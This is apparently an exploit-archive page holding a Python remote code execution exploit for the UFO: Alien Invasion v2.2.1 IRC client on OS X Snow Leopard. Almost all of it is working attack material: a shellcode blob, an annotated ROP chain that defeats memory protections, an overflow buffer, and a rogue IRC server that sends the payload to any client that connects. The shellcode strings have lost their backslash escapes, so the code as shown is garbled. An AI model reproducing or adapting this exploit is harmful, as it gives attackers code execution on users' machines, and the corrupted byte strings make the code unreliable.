UFO: Alien Invasion v2.2.1 IRC Client Remote Code Execution

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : UFO: Alien Invasion v2.2.1 IRC Client Remote Code Execution - OSX Snow Leopard (ROP)
# Published : 2010-07-08
# Author : d1dn0t
# Previous Title : Hero DVD Remote Buffer Overflow Exploit
# Next Title : FathFTP 1.7 ActiveX Buffer Overflow
#!/usr/bin/python

# UFO: Alien Invasion v2.2.1 IRC Client Remote Code Execution - MacOSX
# OS X Snow Leopard: d1dn0t
# OS X Leopard: dookie
# Windows PoC: Jason Geffner http://www.exploit-db.com/exploits/14013

import sys, socket, struct

WRITEABLE = 0x8fe66448
STRCPY=0x8fe2db10

shellcode = ("xdbxc3xd9x74x24xf4xbbxf3xbdx8dx7cx33xc9x5dxb1"
"x27x31x5dx18x03x5dx18x83xc5xf7x5fx78x4dx37x06"
"xd3xeexe7x79x84xbcxb7x1bxe9xc1xb8x59x8fxc1xc6"
"x5dxf9x04x94x0fxabxe0x18xb2x5axadx91x51x36x5d"
"xf2xc3x95xedx9cx26x99x7cx3bxebxccxd2x73x61x3c"
"x52x01x28xecx01xb3x86xa0xb8xf6xa7xb3x90x81x6f"
"x02xc2x12x84x64xb7x47x0cx34x87x3dx7fx3ax95x82"
"xfcxc0x59x71xf2x06x9ex29xa4x38x4ex79x7fx74xee"
"xe9x10xbaxc2x7cx18x73x5exb3x9axf0xa5x4bxefxe1"
"x68x8bx5fx66xa4x24x13x1exd2x15xb1xb7x4cxe0xd6"
"x18xc1xa1x48x29xdax88xe9x78xddx42x63x99x8dx32"
"x20x0ex7ex02xc1x63xfex53x0ex2bxafxd3x43x4cx45")

# ==================== Put stack pointer into EAX/EDX ==================== 
ROP = 	struct.pack('<I',0x8fe2b3d4)        # POP - RET Insturction - Pop's over the writeable value below
ROP += 	struct.pack('<I',WRITEABLE)					# Required Writeable address here for exploit to work
ROP += 	struct.pack('<I',0x8fe2fb63)				# pop eax # ret
ROP += 	struct.pack('<I',WRITEABLE)					# Pop writeable address into eax for instructions below
ROP += 	struct.pack('<I',0x8fe2fb58)				# push esp # and al,0x4 # mov [eax+0x28],edx # mov edx,[esp] # mov [eax],edx # pop eax # ret 

# ==================== Jump Over Parameters below ==================== 
ROP += 	struct.pack('<I',0xffff1d6b)				# add esp,byte +0x1c # pop ebp # ret

# ==================== strcpy call ==================== 
ROP += 	struct.pack('<I',STRCPY)						# use strcpy to copy shellcode from stack to heap
ROP += 	struct.pack('<I',0x8fe2dfd1)				# POP - POP - RET over strcpy params
ROP += 	struct.pack('<I',WRITEABLE)					# Dst Param for strcpy
ROP += 	'EEEE'															# Src Param for strcpy
ROP += 	struct.pack('<I',WRITEABLE)					# Move execution to where we moved our shell
ROP += 	'C'*12															# Padding 

# ==================== Craft Parameter 2  ==================== 

# Need to inc EAX or EDX to point to shell code

# Store  0x40 in ECX
ROP += 	struct.pack('<I',0x8fe2dae4)					# mov ecx,[esp+0x4] # add eax,edx # sub eax,ecx # ret  
ROP += 	struct.pack('<I',0x8fe2b3d4) 	       		    # POP - RET Insturction - Pop's over the value below
ROP += 	struct.pack('<I',0xffffffff)					# Value to store in ecx
ROP += 	struct.pack('<I',0x8fe0c0c7)					# inc ecx # xor al,0xc9
ROP += 	struct.pack('<I',0x8fe0c0c7)					# inc ecx # xor al,0xc9
ROP += 	struct.pack('<I',0x8fe24b3c)			 		# add ecx,ecx # ret
ROP += 	struct.pack('<I',0x8fe24b3c)					# add ecx,ecx # ret
ROP += 	struct.pack('<I',0x8fe24b3c)					# add ecx,ecx # ret
ROP += 	struct.pack('<I',0x8fe24b3c)					# add ecx,ecx # ret

# Replace stack pointer back into eax as it was trashed
ROP += 	struct.pack('<I',0x8fe2c71d)					# mov eax,edx # ret

# Add offset to paramter 
ROP += 	struct.pack('<I',0x8fe2def4)					# add eax,ecx # ret

# Swap over so we can work on fresh copy of saved ESP
ROP += 	struct.pack('<I',0x8fe0e32d)					# xchg eax,edx

# Double ECX a few more times to point to our nop sled/shell code
ROP += 	struct.pack('<I',0x8fe0c0c7)					# inc ecx # xor al,0xc9
ROP += 	struct.pack('<I',0x8fe0c0c7)					# inc ecx # xor al,0xc9
ROP += 	struct.pack('<I',0x8fe24b3c)					# add ecx,ecx # ret
ROP += 	struct.pack('<I',0x8fe24b3c)					# add ecx,ecx # ret
ROP += 	struct.pack('<I',0x8fe24b3c)					# add ecx,ecx # ret

# Add offset to shellcode 
ROP += 	struct.pack('<I',0x8fe2def4)					# add eax,ecx # ret

# Swap back
ROP += 	struct.pack('<I',0x8fe0e32d)					# xchg eax,edx

# Copy parameter to placeholder
ROP += 	struct.pack('<I',0x8fe2fb61)					# mov [eax],edx # pop eax # ret
ROP += 	'G'*4																	# junk

# ==================== Call strcpy function ==================== 

# Set our Stack pointer back to original value 
ROP += 	struct.pack('<I',0x8fe0e32d)					# xchg eax,edx
ROP += 	struct.pack('<I',0x8fe2daea)					# sub eax,ecx # ret

# Return execution to our strdup call above
ROP += 	struct.pack('<I',0x8fe0b1c2)					# xchg eax,ebp # inc ebp # ret 
ROP += 	struct.pack('<I',0x8fe2b6a5)					# dec ebp # ret
ROP += 	struct.pack('<I',0xffff01f3)					# mov esp,ebp # pop ebp # ret
ROP += 	'G'*4																	# junk

# ==================== Call Exploit code from heap ==================== 


sploit = "001 :"
sploit += "x41" * 528
sploit += ROP
sploit += 'x90' * 10
sploit += shellcode
sploit += "x0dx0a"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', 6667))
s.listen(1)
print ("[*] Listening on port 6667.")
print ("[*] Have someone connect to you.")
print ("[*] Type [control]-c to exit.")
conn, addr = s.accept()
print '[*] Received connection from: ', addr

conn.send(sploit)
conn.close